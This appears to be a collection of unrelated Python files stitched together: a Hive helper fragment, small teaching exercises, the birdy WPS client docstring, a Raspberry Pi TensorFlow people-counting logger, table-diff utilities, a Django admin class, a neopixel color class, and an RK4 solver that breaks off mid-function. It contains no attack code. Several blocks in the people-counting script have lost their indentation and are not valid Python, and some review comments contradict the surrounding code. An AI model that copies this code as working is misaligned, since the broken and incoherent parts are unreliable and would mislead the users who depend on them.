        backward compatibility with keyword callers.
        """
        if not self._active:
            raise jaydebeapi.OperationalError("HiveHelper has no active connection(s)")
        partitions_results = self.run_query("show tables")
        if filter:
            tables = [x[0] for x in partitions_results.rows if x[0].find(filter) != -1]
        else:
            tables = [x[0] for x in partitions_results.rows]
        if not tables:
            return []
        return tables
|
# Rename a Directory
import os

# Show the directory that all relative paths below resolve against.
print(os.getcwd())
# NOTE(review): os.mkdir raises FileExistsError if 'new_child' already exists
# (e.g. on a second run) -- confirm this demo only runs in a clean directory.
os.mkdir('new_child')
print('Created new_child dir')
print(os.listdir())
# Rename the directory just created.
os.rename('new_child', 'old_child')
print('Renamed new_child as old_child')
print(os.listdir())
|
from math import factorial
class factor:
    """Toy wrapper class exposing a recursive factorial method."""

    def factorial(self, n):
        """Return n!, or an error string for negative n (kept for
        backward compatibility with existing callers).

        Fixed: the original method lacked `self`, so instance calls like
        factor().factorial(5) raised TypeError; its recursion only "worked"
        by accidentally resolving to math.factorial at module scope.
        """
        if n == 0:
            return 1
        elif n < 0:
            return "number is in negative can't do factorial"
        else:
            return n * self.factorial(n - 1)

# Preserve the original import-time side effect: the class-body
# print(factorial(5)) printed 120 (via the accidental math.factorial
# resolution described above).
print(factor().factorial(5))
if __name__ == '__main__':
    # Exercise the factorial method through an instance (C-style semicolon
    # and cramped spacing removed).
    calling = factor()
    output = calling.factorial(5)
    print(output)
'''
Created on Jun 12, 2020
@author: Poshan
'''
class Lambda1:
    """Demonstrates two minimal lambda expressions."""

    def useLambdaFunctions(self):
        """Print the results of an add-15 lambda and a multiply lambda."""
        add_fifteen = lambda value: value + 15
        multiply = lambda left, right: left * right
        print(add_fifteen(10))
        print(multiply(10, 20))
# Run the lambda demonstration at import time.
obj = Lambda1()
obj.useLambdaFunctions()
"""WPSClient Class.
The :class:`WPSClient` class aims to make working with WPS servers easy,
even without any prior knowledge of WPS.
Calling the :class:`WPSClient` class creates an instance whose methods call
WPS processes. These methods are generated at runtime based on the
process description provided by the WPS server. Calling a function sends
an `execute` request to the server. The server response is parsed and
returned as a :class:`WPSExecution` instance, which includes information
about the job status, the progress percentage, the starting time, etc. The
actual output from the process is obtained by calling the `get` method.
The output is parsed to convert the outputs in native Python whenever possible.
`LiteralOutput` objects (string, float, integer, boolean) are automatically
converted to their native format. For `ComplexOutput`, the module can either
return a link to the output files stored on the server, or try to
convert the outputs to a Python object based on their mime type. This conversion
will occur with `get(asobj=True)`. So for example, if the mime type is
'application/json', the output would be a `dict`.
Inputs to processes can be native Python types (string, float, int, date, datetime),
http links or local files. Local files can be transferred to a remote server by
including their content into the WPS request. Simply set the input to a valid path
or file object and the client will take care of reading and converting the file.
Example
-------
If a WPS server with a simple `hello` process is running on the local host on port 5000::
>>> from birdy import WPSClient
>>> emu = WPSClient('http://localhost:5000/')
>>> emu.hello
<bound method hello of <birdy.client.base.WPSClient object>>
>>> print(emu.hello.__doc__)
# Just says a friendly Hello. Returns a literal string output with Hello plus the inputed name.
# Parameters
# ----------
# name : string
# Please enter your name.
#
# Returns
# -------
# output : string
# A friendly Hello from us.
#
# ""
#
# # Call the function. The output is a namedtuple
# >>> emu.hello('stranger')
# hello(output='Hello stranger')
Authentication
--------------
If you want to connect to a server that requires authentication, the
:class:`WPSClient` class accepts an `auth` argument that
behaves exactly like in the popular `requests` module
(see `requests Authentication`_)
The simplest form of authentication is HTTP Basic Auth. Although
wps processes are not commonly protected by this authentication method,
here is a simple example of how to use it::
>>> from birdy import WPSClient
>>> from requests.auth import HTTPBasicAuth
>>> auth = HTTPBasicAuth('user', 'pass')
>>> wps = WPSClient('http://www.example.com/wps', auth=auth)
Because any `requests`-compatible class is accepted, custom
authentication methods are implemented the same way as in `requests`.
For example, to connect to a magpie_ protected wps, you can use the
requests-magpie_ module::
>>> from birdy import WPSClient
>>> from requests_magpie import MagpieAuth
>>> auth = MagpieAuth('https://www.example.com/magpie', 'user', 'pass')
>>> wps = WPSClient('http://www.example.com/wps', auth=auth)
Output format
-------------
Birdy automatically manages process output to reflect its default values or
Birdy's own defaults.
However, it's possible to customize the output of a process. Each process has an input
named ``output_formats``, which takes a dictionary as a parameter::
# example format = {
# 'output_identifier': {
# 'as_ref': <True, False or None>
# 'mimetype': <MIME type as a string or None>,
# },
# }
# A dictionary defining netcdf and json outputs
>>> custom_format = {
>>> 'netcdf': {
>>> 'as_ref': True,
>>> 'mimetype': 'application/json',
>>> },
>>> 'json': {
>>> 'as_ref': False,
>>> 'mimetype': None
>>> }
>>> }
Utility functions can also be used to create this dictionary::
>>> custom_format = create_output_dictionary('netcdf', True, 'application/json')
>>> add_output_format(custom_format, 'json', False, None)
The created dictionary can then be used with a process::
>>> cli = WPSClient("http://localhost:5000")
>>> z = cli.output_formats(output_formats=custom_format).get()
>>> z
.. _requests Authentication: https://2.python-requests.org/en/master/user/authentication/
.. _magpie: https://github.com/ouranosinc/magpie
.. _requests-magpie: https://github.com/ouranosinc/requests-magpie
"""
from birdy.client.notebook import gui # noqa: F401
from .base import WPSClient, nb_form # noqa: F401
|
'''
@author :kpkishankrishna
Write a piece of Python code that prints out the string
'hello world' if the value of an integer variable,
happy, is strictly greater than 2.
'''
# Read the integer "happiness" value from standard input.
HAPPY = int(input())
# Greet only when strictly greater than 2, per the exercise statement.
if HAPPY > 2:
    print("hello world")
|
######## Picamera Object Detection Using Tensorflow Classifier #########
#
# Author: Evan Juras
# Date: 4/15/18
# Description:
# This program uses a TensorFlow classifier to perform object detection.
# It loads the classifier uses it to perform object detection on a Picamera feed.
# It draws boxes and scores around the objects of interest in each frame from
# the Picamera. It also can be used with a webcam by adding "--usbcam"
# when executing this script from the terminal.
## Some of the code is copied from Google's example at
## https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb
## and some is copied from Dat Tran's example at
## https://github.com/datitran/object_detector_app/blob/master/object_detection_app.py
## but I changed it to make it more understandable to me.
# Import packages
import os
import cv2
import numpy as np
from picamera.array import PiRGBArray
from picamera import PiCamera
import tensorflow as tf
import argparse
import sys
import csv
import datetime
def csv_write(file_name, rights, counter, data):
    """Write one log-row dict to file_name.

    Parameters:
        file_name: path of the CSV file.
        rights: open() mode, e.g. 'a' to append or 'w' to overwrite.
        counter: unused; kept only so existing call sites keep working.
        data: dict keyed by the standard log fields below.

    Fixed: the original had a no-op bare `counter` expression statement and a
    C-style `return;`.
    """
    with open(file_name, rights, newline='') as f:
        fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
        thewriter = csv.DictWriter(f, fieldnames=fields)
        thewriter.writerow(data)
def erase_csv(file_name):
    """Truncate file_name to zero length (creating it if missing).

    Opening in "w" mode already truncates, so the original's explicit
    truncate() call was redundant; a context manager guarantees the handle
    is closed.
    """
    with open(file_name, "w"):
        pass
##MICROSECONDS = currentDT.microsecond
#All the logs to bve initially stored
with open('person_log.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#Minute averaged data to be stored here
with open('minute_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
with open('hour_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#All days data to be represented to be shown here.
with open('day_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
#All weeks data to be logged here
with open('week_logs.csv', 'w', newline='') as f:
fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
thewriter = csv.DictWriter(f, fieldnames = fields)
thewriter.writeheader()
csv_counter = 0
second_counter = 0
minute_counter = 0
hour_counter = 0
day_counter = 0
month_counter = 0
HOUR_FLAG = 0
MINUTE_FLAG = 0
DAY_FLAG = 0
MONTH_FLAG = 0
# Set up camera constants
IM_WIDTH = 1280
IM_HEIGHT = 720
#IM_WIDTH = 640 Use smaller resolution for
#IM_HEIGHT = 480 slightly faster framerate
# Select camera type (if user enters --usbcam when calling this script,
# a USB webcam will be used)
camera_type = 'picamera'
parser = argparse.ArgumentParser()
parser.add_argument('--usbcam', help='Use a USB webcam instead of picamera',
action='store_true')
args = parser.parse_args()
if args.usbcam:
camera_type = 'usb'
# This is needed since the working directory is the object_detection folder.
sys.path.append('..')
# Import utilites
from utils import label_map_util
from utils import visualization_utils as vis_util
# Name of the directory containing the object detection module we're using
MODEL_NAME = 'ssdlite_mobilenet_v2_coco_2018_05_09'
# Grab path to current working directory
CWD_PATH = os.getcwd()
# Path to frozen detection graph .pb file, which contains the model that is used
# for object detection.
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,'data','mscoco_label_map.pbtxt')
# Number of classes the object detector can identify
NUM_CLASSES = 90
## Load the label map.
# Label maps map indices to category names, so that when the convolution
# network predicts `5`, we know that this corresponds to `airplane`.
# Here we use internal utility functions, but anything that returns a
# dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load the Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
sess = tf.Session(graph=detection_graph)
# Define input and output tensors (i.e. data) for the object detection classifier
# Input tensor is the image
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Output tensors are the detection boxes, scores, and classes
# Each box represents a part of the image where a particular object was detected
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represents level of confidence for each of the objects.
# The score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Number of objects detected
num_detections = detection_graph.get_tensor_by_name('num_detections:0')

# Initialize frame rate calculation
frame_rate_calc = 2  # seed value; recomputed from tick counts after each frame
freq = cv2.getTickFrequency()
font = cv2.FONT_HERSHEY_SIMPLEX

# Initialize camera and perform object detection.
# The camera has to be set up and used differently depending on if it's a
# Picamera or USB webcam.
# I know this is ugly, but I basically copy+pasted the code for the object
# detection loop twice, and made one work for Picamera and the other work
# for USB.

### Picamera ###
if camera_type == 'picamera':
    # Initialize Picamera and grab reference to the raw capture
    camera = PiCamera()
    camera.resolution = (IM_WIDTH,IM_HEIGHT)
    camera.framerate = 20
    rawCapture = PiRGBArray(camera, size=(IM_WIDTH,IM_HEIGHT))
    rawCapture.truncate(0)

    for frame1 in camera.capture_continuous(rawCapture, format="bgr",use_video_port=True):

        t1 = cv2.getTickCount()

        # Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
        # i.e. a single-column array, where each item in the column has the pixel RGB value
        frame = np.copy(frame1.array)
        frame.setflags(write=1)
        frame_expanded = np.expand_dims(frame, axis=0)

        # Perform the actual detection by running the model with the image as input
        (boxes, scores, classes, num) = sess.run(
            [detection_boxes, detection_scores, detection_classes, num_detections],
            feed_dict={image_tensor: frame_expanded})

        # Count persons: class id 1 is "person" in the COCO label map, so every
        # detection whose class id is > 1 is a non-person.
        number_of_objects = int(num[0])
        classes_without_person = classes[np.nonzero(classes>1.00)]
        number_of_classes = len(classes_without_person)
        number_of_persons = number_of_objects - number_of_classes
        #print("Original: ")
        #print(classes)
        #print('\n\r')
        print("Number of People in the Room: ")
        print(number_of_persons)
        print('\n\r')

        currentDT = datetime.datetime.now() #updating the current time
        #fetching all the Time values
        YEAR = currentDT.year
        MONTH = currentDT.month
        DATE = currentDT.day
        HOUR = currentDT.hour
        MINUTES = currentDT.minute
        SECONDS = currentDT.second

        #setting flags as to decide when to start or stop updates
        # Each flag latches the current minute/hour/day so rollovers can be
        # detected below (flags are reset when the corresponding unit changes).
        if(MINUTE_FLAG == 0):
            minute_temp = int(MINUTES)
            print("into_minute_flg")
            MINUTE_FLAG = 1
            second_counter = 0
        if(HOUR_FLAG == 0):
            hour_temp = int(HOUR)
            print("into_hour_flg")
            HOUR_FLAG = 1
        if(DAY_FLAG == 0):
            day_temp = int(DATE)
            print("into_daye_flg")
            DAY_FLAG = 1

        # putting everything in the person logger . It can store data upto 6 hours
        # NOTE(review): rows are appended without ever writing a header row.
        with open('person_log.csv', 'a', newline='') as f:
            fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
            thewriter = csv.DictWriter(f, fieldnames = fields)
            csv_counter = csv_counter + 1
            thewriter.writerow({'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(number_of_persons)})
        if(csv_counter >= 21600): #entries upto six hours is only stored.
            # Wipe the log once it reaches 6 h of one-per-second entries.
            f = open("person_log.csv", "w")
            f.truncate()
            f.close()
            csv_counter = 0
        print(csv_counter)

        if((minute_temp - MINUTES) == 0):
            #updating the csv
            # Still within the latched minute: append one per-second sample.
            with open('minute_logs.csv', 'a', newline='') as f:
                fields = ['YEAR', 'MONTH', 'DATE', 'HOUR', 'MINUTES', 'SECONDS', 'NUMBER']
                thewriter = csv.DictWriter(f, fieldnames = fields)
                second_counter = second_counter + 1
                thewriter.writerow({'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(number_of_persons)})
        else:
            # Minute rolled over: average the per-second samples (zeros excluded)
            # and push one row into the hourly log.
            MINUTE_FLAG = 0
            with open("minute_logs.csv", "r") as f:
                reader = csv.reader(f)
                data = [row for row in reader]
            del data[0]
            rows = len(data) #this is the way you decide the number of rows in a list
            total_entries = rows
            columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
            add = 0
            for i in range(rows):
                print("The sum before add is :", add)
                add = add + int(data[i][6])
                if((int(data[i][6])) == 0):
                    total_entries = total_entries - 1
            #del data[0]
            print("The final addition is:", add)
            print("The total number of entries are :", total_entries)
            if(total_entries):
                minutes_average = add/total_entries
            else:
                minutes_average = 0
            minutes_average = int(minutes_average)
            # csv_write / erase_csv / hour_counter are defined earlier in this
            # file (not shown here) -- TODO confirm their signatures.
            csv_write('hour_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(minutes_average)})
            erase_csv("minute_logs.csv")

        if((hour_temp - HOUR) != 0):
            # Hour rolled over: average the per-minute rows.
            # NOTE(review): this writes the hourly average to 'day_logs.csv',
            # not 'hour_logs.csv' -- looks inconsistent with the minute branch;
            # confirm intended destination.
            HOUR_FLAG = 0
            with open("hour_logs.csv", "r") as f:
                reader = csv.reader(f)
                data = [row for row in reader]
            del data[0]
            rows = len(data) #this is the way you decide the number of rows in a list
            total_entries = rows
            columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
            add = 0
            for i in range(rows):
                print("The sum before add is :", add)
                add = add + int(data[i][6])
                if((int(data[i][6])) == 0):
                    total_entries = total_entries - 1
            #del data[0]
            print("The final addition is:", add)
            print("The total number of entries are :", total_entries)
            if(total_entries):
                hour_average = add/total_entries
            else:
                hour_average = 0
            hour_average = int(hour_average)
            csv_write('day_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(hour_average)})

        if((day_temp - DATE) != 0):
            # Day rolled over: average the hourly rows.
            DAY_FLAG = 0
            with open("hour_logs.csv", "r") as f:
                reader = csv.reader(f)
                data = [row for row in reader]
            del data[0]
            rows = len(data) #this is the way you decide the number of rows in a list
            total_entries = rows
            columns = len(data[0]) # this is the way to determine the nmumber of columns in the list
            add = 0
            for i in range(rows):
                print("The sum before add is :", add)
                add = add + int(data[i][6])
                if((int(data[i][6])) == 0):
                    total_entries = total_entries - 1
            #del data[0]
            print("The final addition is:", add)
            print("The total number of entries are :", total_entries)
            if(total_entries):
                day_average = add/total_entries
            else:
                day_average = 0
            # NOTE(review): almost certainly a bug -- this should be
            # int(day_average); the computed day average is discarded.
            day_average = int(hour_average)
            csv_write('day_logs.csv', 'a',hour_counter, {'YEAR': str(YEAR), 'MONTH': str(MONTH), 'DATE': str(DATE), 'HOUR': str(HOUR), 'MINUTES': str(MINUTES), 'SECONDS':str(SECONDS), 'NUMBER':str(day_average)})

        # Draw the results of the detection (aka 'visulaize the results')
        vis_util.visualize_boxes_and_labels_on_image_array(
            frame,
            np.squeeze(boxes),
            np.squeeze(classes).astype(np.int32),
            np.squeeze(scores),
            category_index,
            use_normalized_coordinates=True,
            line_thickness=8,
            min_score_thresh=0.40)

        cv2.putText(frame,"FPS: {0:.2f}".format(frame_rate_calc),(30,50),font,1,(255,255,0),2,cv2.LINE_AA)
        # NOTE(review): verbose_classes is computed but never used afterwards.
        verbose_classes = [category_index.get(i) for i in classes[0]]

        # All the results have been drawn on the frame, so it's time to display it.
        cv2.imshow('Object detector', frame)

        t2 = cv2.getTickCount()
        time1 = (t2-t1)/freq
        frame_rate_calc = 1/time1

        # Press 'q' to quit
        if cv2.waitKey(1) == ord('q'):
            break

        rawCapture.truncate(0)

    camera.close()
### USB webcam ###
elif camera_type == 'usb':
    # Initialize USB webcam feed
    camera = cv2.VideoCapture(0)
    ret = camera.set(3,IM_WIDTH)   # property id 3: capture frame width
    ret = camera.set(4,IM_HEIGHT)  # property id 4: capture frame height

    while(True):

        t1 = cv2.getTickCount()

        # Acquire frame and expand frame dimensions to have shape: [1, None, None, 3]
        # i.e. a single-column array, where each item in the column has the pixel RGB value
        ret, frame = camera.read()
        frame_expanded = np.expand_dims(frame, axis=0)

        # Perform the actual detection by running the model with the image as input
        (boxes, scores, classes, num) = sess.run(
            [detection_boxes, detection_scores, detection_classes, num_detections],
            feed_dict={image_tensor: frame_expanded})

        # Draw the results of the detection (aka 'visulaize the results')
        # NOTE(review): the score threshold here (0.85) differs from the
        # picamera branch (0.40) -- confirm this asymmetry is intentional.
        vis_util.visualize_boxes_and_labels_on_image_array(
            frame,
            np.squeeze(boxes),
            np.squeeze(classes).astype(np.int32),
            np.squeeze(scores),
            category_index,
            use_normalized_coordinates=True,
            line_thickness=8,
            min_score_thresh=0.85)

        cv2.putText(frame,"FPS: {0:.2f}".format(frame_rate_calc),(30,50),font,1,(255,255,0),2,cv2.LINE_AA)

        # All the results have been drawn on the frame, so it's time to display it.
        cv2.imshow('Object detector', frame)

        t2 = cv2.getTickCount()
        time1 = (t2-t1)/freq
        frame_rate_calc = 1/time1

        # Press 'q' to quit
        if cv2.waitKey(1) == ord('q'):
            break

    camera.release()

cv2.destroyAllWindows()
|
"""calculate the diffs for mathdiff.py and tablediff.py"""
import py
def dodiff(v1, v2, func=None, thelimit=0):
    """Return the diff between v1 and v2 as a (diff, isdiff) tuple.

    Behavior (unchanged from the original contract):
      1. Text values (not convertible to float):
         a. equal   -> (v1, False)
         b. unequal -> ((v1, v2), True)
      2. Numeric values:
         a. equal           -> (0, False)
         b. func is None    -> (v2 - v1, True)
         c. func given      -> func(float(v1), float(v2), thelimit)
            (e.g. percdiff / deltdiff, which apply thelimit themselves)

    Fixed: the Python-2-only ``except ValueError, e`` syntax is replaced with
    the form accepted by both Python 2.6+ and Python 3.
    """
    if v1 == v2:
        try:
            float(v1), float(v2)    # 2a and 3a: identical numbers
            return (0, False)
        except ValueError:
            return (v1, False)      # 1a: identical text
    else:
        try:
            f1, f2 = float(v1), float(v2)
            if not func:
                return (f2 - f1, True)           # plain delta, always flagged
            else:
                return func(f1, f2, thelimit)    # 2b, 2c, 3b, 3c
        except ValueError:
            return ((v1, v2), True)              # 1b: differing text
def deltdiff(v1, v2, deltdifflimit=0):
    """Delta diff: return (v2 - v1, isdiff), flagging |diff| > |limit|."""
    change = v2 - v1
    return (change, abs(change) > abs(deltdifflimit))
def percdiff(v1, v2, percdifflimit=0):
    """Percentage diff relative to v1: (diff, isdiff), |diff| > |limit| flags."""
    v1, v2 = float(v1), float(v2)
    if v1 == 0 and v2 == 0:
        return (0.0, False)
    # TODO : what to return when v1 = 0 ?? (currently raises ZeroDivisionError)
    change = (v2 - v1) / v1 * 100
    return (change, abs(change) > abs(percdifflimit))
def equal_matrixsize(mat1, mat2):
    """Return True if mat1 and mat2 have the same configuration of cells
    (same number of rows, and each corresponding row has the same length)."""
    if mat1 == mat2:
        return True
    if len(mat1) != len(mat2):
        return False
    for row_a, row_b in zip(mat1, mat2):
        if len(row_a) != len(row_b):
            return False
    return True
class MatrixSizeError(Exception):
    """Raised when two tables do not share the same cell configuration."""
def tablediff(table1, table2, func=None, thelimit=0):
    """Return a difftable that is the difference between table1 and table2.

    Each cell of the result is ``dodiff(cell1, cell2, func, thelimit)``, i.e.
    a ``(thediff, isdiff)`` tuple; with ``func=None`` the numeric diff is
    ``cell2 - cell1``.

    :raises MatrixSizeError: when the two tables' dimensions differ.

    Fixed: the Python-2-only ``raise Exc, msg`` syntax is replaced with the
    call form accepted by both Python 2 and Python 3.
    """
    if not equal_matrixsize(table1, table2):
        raise MatrixSizeError("the sizes of the two tables do not match")
    thetable = []
    for row1, row2 in zip(table1, table2):
        therow = []
        for cell1, cell2 in zip(row1, row2):
            therow.append(dodiff(cell1, cell2, func, thelimit))
        thetable.append(therow)
    return thetable
|
from django.contrib import admin
from .models import Service
class ServicesAdmin(admin.ModelAdmin):
    """Django admin configuration for Service entries."""
    # Columns shown in the changelist (order_by first so editing it is handy)
    list_display = ['order_by','title', 'slug', 'is_published']
    # Columns that link through to the change form
    list_display_links = ('title', 'slug',)
    # Columns editable inline from the changelist
    list_editable = ('order_by','is_published',)
    # Auto-fill the slug from the title while typing in the change form
    prepopulated_fields = {'slug': ('title',)}

admin.site.register(Service, ServicesAdmin)
|
from __future__ import division
class PixelColor(object):
    """
    Represents a single neopixel color (either RGB or RGBW).

    The ``red``, ``blue``, ``green``, and ``white`` components can either be
    between 0 and 1 (normalized), or between 0 and 255. PixelColor will
    attempt to determine automatically whether the components are normalized,
    but this can be forced with ``normalized``.

    All object attributes are read-only.

    :param red: (float|int) Red component.
    :param green: (float|int) Green component.
    :param blue: (float|int) Blue component.
    :param white: (float|int) White component (set to ``None`` if RGB only).
    :param normalized: (bool) Whether the color is normalized (will be guessed
        if ``None``).
    """

    def __init__(self, red=0, green=0, blue=0, white=None, normalized=None):
        self._red = red
        self._green = green
        self._blue = blue
        self._white = white
        self._normalized = normalized
        if normalized is None:
            # We're guessing whether the input is normalized (between 0 and 1)
            # or not. If any component is greater than 1 then we assume that
            # the input is not normalized.
            white_test = 0 if white is None else white
            self._normalized = not (
                red > 1 or green > 1 or blue > 1 or white_test > 1
            )

    def __repr__(self):
        return '{}(red={}, green={}, blue={}, {}normalized={})'.format(
            self.__class__.__name__,
            self.red, self.green, self.blue,
            '' if self.is_rgb else 'white={}, '.format(self.white),
            self.is_normalized
        )

    def __str__(self):
        # Normalized components are shown with limited precision ({:.5g});
        # denormalized (integer) components are shown verbatim.
        if self._normalized:
            formatter = ('{}(red={:.5g}, green={:.5g}, blue={:.5g}, '
                         '{}normalized={})')
        else:
            formatter = '{}(red={}, green={}, blue={}, {}normalized={})'
        white_str = ''
        if self.is_rgbw:
            white_str = (
                'white={:.5g}, '.format(self.white) if self.is_normalized
                else 'white={}, '.format(self.white)
            )
        return formatter.format(
            self.__class__.__name__,
            self.red, self.green, self.blue, white_str,
            self.is_normalized
        )

    def _normalize(self, val):
        """
        Normalizes a single color component. Does nothing if the component
        is already normalized.

        :param val: (float|int) The component value to convert.
        :return: (float) A normalized value between 0 and 1.
        """
        if self.is_normalized:
            return val
        else:
            return float(val / 255)

    def _denormalize(self, val):
        """
        Denormalizes a single color component. Does nothing if the component
        is already denormalized.

        :param val: (float|int) The component value to convert.
        :return: (float|int) A denormalized value between 0 and 255
            (an int when conversion was performed).
        """
        if self.is_normalized:
            return int(val * 255)
        else:
            return val

    def _sanitize_component(self, val):
        """
        Sanitize a component value. Denormalized values will always be
        returned as integers. Normalized values are clipped between 0.0 and
        1.0.

        :param val: (float|int) Component value to sanitize.
        :return: (float|int) Sanitized value.
        """
        if self.is_normalized:
            # Lock normalized values between 0 and 1.
            if val < 0:
                return 0.0
            if val > 1:
                return 1.0
            return val
        else:
            # Lock denormalized values between 0 and 255.
            if val < 0:
                return 0
            if val > 255:
                return 255
            return int(val)

    @property
    def red(self):
        """
        (float|int) The red component.
        """
        return self._sanitize_component(self._red)

    @property
    def green(self):
        """
        (float|int) The green component.
        """
        return self._sanitize_component(self._green)

    @property
    def blue(self):
        """
        (float|int) The blue component.
        """
        return self._sanitize_component(self._blue)

    @property
    def white(self):
        """
        (float|int) The white component (``None`` for RGB-only colors).
        """
        if self._white is None:
            return None
        return self._sanitize_component(self._white)

    @property
    def is_normalized(self):
        """
        (bool) Whether the color is normalized.
        """
        return self._normalized

    @property
    def is_rgb(self):
        """
        (bool) Whether the color is RGB only.
        """
        return self.white is None

    @property
    def is_rgbw(self):
        """
        (bool) Whether the color is RGBW.
        """
        return self.white is not None

    @property
    def components(self):
        """
        The color as a tuple of RGB(W) component values. Values will either be
        normalized or denormalized to match ``is_normalized``.
        """
        if self.is_rgb:
            return self.red, self.green, self.blue
        else:
            return self.red, self.green, self.blue, self.white

    @property
    def components_normalized(self):
        """
        The color as a tuple of normalized RGB(W) component values.
        """
        if self.is_rgb:
            return (
                self._normalize(self.red),
                self._normalize(self.green),
                self._normalize(self.blue),
            )
        else:
            return (
                self._normalize(self.red),
                self._normalize(self.green),
                self._normalize(self.blue),
                self._normalize(self.white),
            )

    @property
    def components_denormalized(self):
        """
        The color as a tuple of denormalized RGB(W) component values.
        """
        if self.is_rgb:
            return (
                self._denormalize(self.red),
                self._denormalize(self.green),
                self._denormalize(self.blue),
            )
        else:
            return (
                self._denormalize(self.red),
                self._denormalize(self.green),
                self._denormalize(self.blue),
                self._denormalize(self.white),
            )

    @property
    def hardware_components(self):
        """
        The color as a tuple of integers suitable for passing to
        ``Adafruit_NeoPixel.setPixelColorRGB()`` for display on neopixel
        hardware.
        """
        return self.components_denormalized

    @property
    def hardware_int(self):
        """
        The color as an integer suitable for passing to
        ``Adafruit_NeoPixel.setPixelColor()`` for display on neopixel hardware.
        Packed as 0xWWRRGGBB (white byte only for RGBW colors).
        """
        if self.is_rgb:
            return (
                self._denormalize(self.red) << 16 |
                self._denormalize(self.green) << 8 |
                self._denormalize(self.blue)
            )
        else:
            return (
                self._denormalize(self.white) << 24 |
                self._denormalize(self.red) << 16 |
                self._denormalize(self.green) << 8 |
                self._denormalize(self.blue)
            )
|
import numpy as np
from matplotlib import pyplot as plt
import math
class ODESolver:
    """Base class for fixed-step ODE integrators of dy/dx = F(x, y).

    Subclasses implement advance(), returning the increment added to the
    current state for one step.

    NOTE(review): advance() implementations read self.interval_start, which
    solve() never updates, so F always sees the initial x. Harmless for
    autonomous systems (F independent of x) but wrong otherwise -- confirm
    before reusing with x-dependent right-hand sides.
    """

    def __init__(self, F):
        # Right-hand side of the ODE.
        self.F = F

    def set_Inital_Conditions(self, y):
        # (sic) public name kept as-is for caller compatibility.
        self.y = y

    def solve(self, x, interval_stop, step):
        """Integrate from x to interval_stop; return (X, Y) numpy arrays."""
        self.interval_start = x
        self.interval_stop = interval_stop
        self.step = step

        grid = [self.interval_start]
        states = [self.y]
        position = x
        while position < interval_stop:
            self.y = self.y + self.advance()
            position = position + step
            grid.append(position)
            states.append(self.y)
        return np.array(grid), np.array(states)

    def advance(self):
        """One integration step; must be provided by a concrete subclass."""
        raise NotImplementedError
class RK4(ODESolver):
    """Classical fourth-order Runge-Kutta stepper."""

    def advance(self):
        # NOTE(review): x is always self.interval_start (never advanced by
        # solve()); fine for the autonomous F used below -- verify otherwise.
        f, x0, state, h = self.F, self.interval_start, self.y, self.step
        k1 = h * f(x0, state)
        k2 = h * f(x0 + h / 2.0, state + k1 / 2.0)
        k3 = h * f(x0 + h / 2.0, state + k2 / 2.0)
        k4 = h * f(x0 + h, state + k3)
        return (k1 + 2.0 * k2 + 2.0 * k3 + k4) / 6
# --- Physical parameters for the spinning-ball trajectory ---
g = 9.81              # gravity (m/s^2)
d = 0.063             # ball diameter (m)
m = 0.05              # ball mass (kg)
air_density = 1.28    # air density (kg/m^3)
v0 = 25.0             # launch speed (m/s)
theta = 15.0          # launch angle (degrees)
omega = 20.0          # spin rate
alpha = (air_density * math.pi * d**2)/ (8 * m)   # aerodynamic prefactor
eta = 0               # Magnus-term switch: 0 disables the C_M contributions
x = 0.0               # integration start
xStop = 40            # integration stop
# State vector layout: [horizontal pos, horizontal vel, height, vertical vel]
y = np.array([0, v0*math.cos(math.radians(theta)), 1, v0*math.sin(math.radians(theta))])
h = 0.01              # step size


def F(x,y):
